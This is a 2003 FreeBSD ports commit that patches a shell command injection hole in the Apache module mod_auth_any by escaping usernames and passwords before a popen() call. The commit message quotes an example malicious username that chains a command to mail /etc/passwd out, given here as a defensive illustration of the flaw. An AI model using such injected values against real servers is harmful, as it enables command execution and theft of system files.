aboutsummaryrefslogtreecommitdiffstats
path: root/www
diff options
context:
space:
mode:
authorlioux <lioux@FreeBSD.org>2003-03-25 12:23:11 +0800
committerlioux <lioux@FreeBSD.org>2003-03-25 12:23:11 +0800
commit7b631076c8227f5ca99d8780429699518f8201b9 (patch)
treeba299820ba1d1d7076928347242e06580e143aa2 /www
parent2dc1f72ac69c40b582c646e0da1ede2a2cf94188 (diff)
downloadfreebsd-ports-graphics-7b631076c8227f5ca99d8780429699518f8201b9.tar.gz
freebsd-ports-graphics-7b631076c8227f5ca99d8780429699518f8201b9.tar.zst
freebsd-ports-graphics-7b631076c8227f5ca99d8780429699518f8201b9.zip
o Fix vulnerability that allows execution of arbitrary commands on
the server with the uid of the apache process. Background [1]: "The module accepts a username and password from the web client, passes them to a user-space executable (using popen(3), which invokes a shell) and waits for a response in order to authenticate the user. The password is quoted on the popen() command line to avoid interpretation of shell special chars, but the username is not. Thus a malicious user can execute commands by supplying an appropriately crafted username. (e.g. "foo&mail me@my.home</etc/passwd") "The problem is easily fixed by adding quotes (and escaping any quotes already present) to the username and password in the popen command line." o Fix this by adding a escaping function from [2]. Then, modifying this function appropriately with ideas from [3]. Apply the new escaping code to mod_auth_any. o Bump PORTREVISION Submitted by: Security Officer (nectar), Red Hat Security Response Team <security@redhat.com> [1] Obtained from: mod_auth_any CVS [2], nalin@redhat.com [3]
Diffstat (limited to 'www')
-rw-r--r--www/mod_auth_any/Makefile5
-rw-r--r--www/mod_auth_any/files/bash_single_quote_escape_string.c45
-rw-r--r--www/mod_auth_any/files/patch-mod_auth_any.c37
3 files changed, 87 insertions, 0 deletions
diff --git a/www/mod_auth_any/Makefile b/www/mod_auth_any/Makefile
index 9616135cb8f..50a0c52c202 100644
--- a/www/mod_auth_any/Makefile
+++ b/www/mod_auth_any/Makefile
@@ -7,6 +7,7 @@
PORTNAME= mod_auth_any
PORTVERSION= 1.0.2
+PORTREVISION= 1
CATEGORIES= www
MASTER_SITES= ftp://ftp.itlab.musc.edu/pub/toolbox/mod_auth_any/
EXTRACT_SUFX= .tgz
@@ -20,6 +21,10 @@ RUN_DEPENDS= ${APXS}:${APACHE_PORT}
APXS?= ${LOCALBASE}/sbin/apxs
APACHE_PORT?= ${PORTSDIR}/www/apache13
+post-patch:
+ @${CAT} ${FILESDIR}/bash_single_quote_escape_string.c >> \
+ ${WRKSRC}/${PORTNAME}.c
+
do-build:
@cd ${WRKSRC} && ${APXS} -c ${PORTNAME}.c
diff --git a/www/mod_auth_any/files/bash_single_quote_escape_string.c b/www/mod_auth_any/files/bash_single_quote_escape_string.c
new file mode 100644
index 00000000000..439b205c442
--- /dev/null
+++ b/www/mod_auth_any/files/bash_single_quote_escape_string.c
@@ -0,0 +1,45 @@
+/* Escape special characters in the input string so that the bash
+ shell will not interpolate them when the input string is withing
+ single quotes.
+
+ IN: null-terminated character array containing string to be interpolated
+ OUT: newly allocate (using malloc) null-terminated character array
+ containing the input string with the special characters properly
+ escaped */
+char* bash_single_quote_escape_string(const char *s) {
+ /* used to count the length of the string and the number of single quotes */
+ int str_len, sq_count;
+ int s_pos, buf_pos; /* copy chars loop counter */
+ /* used to hold the final result string */
+ char *buf;
+ const char *escapees = "\"'\\$~` \t|&;()<>";
+
+ /* Count the single quotes.
+ LOOP INVARIANT: str_len < (number of chars in string 's')
+ POSTCONDITION: sq_count == (number of single quotes in string 's') */
+ for (str_len = 0, sq_count = 0; s[str_len] != '\0'; str_len++)
+ if (strchr(escapees, s[str_len]) != NULL)
+ sq_count++;
+
+ /* Allocate the memory for the final string.
+ Each ' (one char) will become \' (2 chars), so multiply by 2
+ and don't forget to add 1 for terminating null. */
+ buf = (char*) malloc(sizeof(char) * (str_len + 1 + sq_count * 2));
+
+ /* Copy the chars of 's' into 'buf', turning each ' into \' */
+ for (s_pos = 0, buf_pos = 0; s_pos < str_len; s_pos++) {
+ /* If we see a single quote, then put '\'' into 'buf' and advance
+ buf_pos 4 positions, else put the next char from 's' into 'buf'
+ and advance buf_pos 1 position. */
+ if(strchr(escapees, s[s_pos]) != NULL) {
+ buf[buf_pos++] = '\\';
+ buf[buf_pos++] = s[s_pos];
+ } else {
+ buf[buf_pos++] = s[s_pos];
+ }
+ }
+ /* don't forget the null terminator */
+ buf[buf_pos] = '\0';
+
+ return buf;
+}
diff --git a/www/mod_auth_any/files/patch-mod_auth_any.c b/www/mod_auth_any/files/patch-mod_auth_any.c
new file mode 100644
index 00000000000..e234b8517b1
--- /dev/null
+++ b/www/mod_auth_any/files/patch-mod_auth_any.c
@@ -0,0 +1,37 @@
+--- mod_auth_any.c.orig Tue Jan 9 05:48:20 2001
++++ mod_auth_any.c Tue Mar 25 01:09:55 2003
+@@ -121,6 +121,7 @@
+
+ */
+
++char* bash_single_quote_escape_string(const char *);
+
+ /* NB: debugging stuff */
+ extern int errno;
+@@ -180,13 +181,25 @@
+ const char *rpw, *w;
+ FILE* ext_authprog;
+ FILE* fp;
++ char *escaped_user, *escaped_password;
+
+ l = (char*) malloc (MAX_STRING_LEN * sizeof(char));
++ memset (l, '\0', MAX_STRING_LEN);
+ execstr = (char*) malloc (MAX_STRING_LEN * sizeof(char));
+
+ setenv ("REMOTE_ADDR", r -> connection -> remote_ip, 1);
++
++ /* escape the user name and the password */
++ escaped_user = bash_single_quote_escape_string(user);
++ escaped_password = bash_single_quote_escape_string(password);
++
+ /* open the program stream */
+- snprintf (execstr, MAX_STRING_LEN, "%s %s \"%s\"", auth_pwfile, user, password);
++ snprintf (execstr, MAX_STRING_LEN, "%s %s %s", auth_pwfile, escaped_user, escaped_password);
++
++ /* free the escaped user and password before we forget */
++ free(escaped_user);
++ free(escaped_password);
++
+ if (!(ext_authprog = popen (execstr, "r"))) {
+
+ ap_log_rerror (APLOG_MARK, APLOG_ERR, r, "Could not popen() on program: %s: %s",